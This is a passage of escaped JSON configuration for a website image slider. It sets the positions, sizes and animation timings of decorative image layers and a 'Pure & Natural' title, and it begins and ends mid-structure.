To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1900,\"start\":850,\"startRelative\":850},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":250,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"11\":{\"text\":\"Image 11\",\"alias\":\"Little leaf 2\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic5.png\",\"imageId\":3235},\"size\":{\"width\":{\"d\":{\"v\":\"319px\",\"e\":true},\"n\":{\"v\":\"182px\",\"e\":true},\"t\":{\"v\":\"182px\"},\"m\":{\"v\":\"88px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"134px\",\"e\":true},\"n\":{\"v\":\"76px\",\"e\":true},\"t\":{\"v\":\"76px\"},\"m\":{\"v\":\"37px\",\"e\":true}},\"originalWidth\":319,\"originalHeight\":134,\"aspectRatio\":{\"d\":{\"v\":2.380597014925373233751315638073720037937164306640625},\"n\":{\"v\":2.380597014925373233751315638073720037937164306640625},\"t\":{\"v\":2.380597014925373233751315638073720037937164306640625},\"m\":{\"v\":2.380597014925373233751315638073720037937164306640625}}},\"position\":{\"x\":{\"d\":{\"v\":\"1121px\",\"e\":true},\"n\":{\"v\":\"18px\",\"e\":true},\"t\":{\"v\":\"715px\",\"e\":true},\"m\":{\"v\":\"359px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"133px\",\"e\":true},\"n\":{\"v\":\"260px\",\"e\":true},\"t\":{\"v\":\"79px\",\"e\":true},\"m\":{\"v\":\"147px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"1\":{\"text\":\"Image 1\",\"alias\":\"Flaster\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic1.png\",\"imageId\":3222},\"size\":{\"width\":{\"d\":{\"v\":\"286px\",\"e\":true},\"n\":{\"v\":\"201px\",\"e\":true},\"t\":{\"v\":\"201px\",\"e\":true},\"m\":{\"v\":\"140px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"168px\",\"e\":true},\"n\":{\"v\":\"118px\",\"e\":true},\"t\":{\"v\":\"118px\",\"e\":true},\"m\":{\"v\":\"82px\",\"e\":true}},\"originalWidth\":286,\"originalHeight\":168,\"aspectRatio\":{\"d\":{\"v\":1.7023809523809523280846178749925456941127777099609375},\"n\":{\"v\":1.7023809523809523280846178749925456941127777099609375},\"t\":{\"v\":1.7023809523809523280846178749925456941127777099609375},\"m\":{\"v\":1.7023809523809523280846178749925456941127777099609375}}},\"position\":{\"x\":{\"d\":{\"v\":\"-90px\",\"e\":true},\"n\":{\"v\":\"710px\",\"e\":true},\"t\":{\"v\":\"-88px\",\"e\":true},\"m\":{\"v\":\"-104px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"105px\",\"e\":true},\"n\":{\"v\":\"329px\",\"e\":true},\"t\":{\"v\":\"78px\",\"e\":true},\"m\":{\"v\":\"58px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":13,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":990},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1440,\"start\":990,\"startRelative\":990},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1440,\"start\":990,\"startRelative\":990},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":570,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"23\":{\"text\":\"Image 14\",\"alias\":\"Cvetic\",\"uid\":23,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic3.png\",\"imageId\":3238},\"size\":{\"width\":{\"d\":{\"v\":\"120px\",\"e\":true},\"n\":{\"v\":\"88px\",\"e\":true},\"t\":{\"v\":\"86px\",\"e\":true},\"m\":{\"v\":\"86px\"}},\"height\":{\"d\":{\"v\":\"108px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"77px\",\"e\":true},\"m\":{\"v\":\"77px\"}},\"originalWidth\":120,\"originalHeight\":108,\"aspectRatio\":{\"d\":{\"v\":1.111111111111111160454356650006957352161407470703125},\"n\":{\"v\":1.111111111111111160454356650006957352161407470703125},\"t\":{\"v\":1.111111111111111160454356650006957352161407470703125},\"m\":{\"v\":1.111111111111111160454356650006957352161407470703125}}},\"position\":{\"x\":{\"d\":{\"v\":\"-558px\",\"e\":true},\"n\":{\"v\":\"-452px\",\"e\":true},\"t\":{\"v\":\"-251px\",\"e\":true},\"m\":{\"v\":\"-251px\"}},\"y\":{\"d\":{\"v\":\"-189px\",\"e\":true},\"n\":{\"v\":\"-127px\",\"e\":true},\"t\":{\"v\":\"31px\",\"e\":true},\"m\":{\"v\":\"31px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":14,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":480},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"22\":{\"text\":\"Pure & Natural\",\"alias\":\"Title\",\"uid\":22,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"397px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-341px\",\"e\":true},\"n\":{\"v\":\"-219px\",\"e\":true},\"t\":{\"v\":\"-34px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-86px\",\"e\":true},\"n\":{\"v\":\"-45px\",\"e\":true},\"t\":{\"v\":\"137px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":15,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":550},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1650,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\"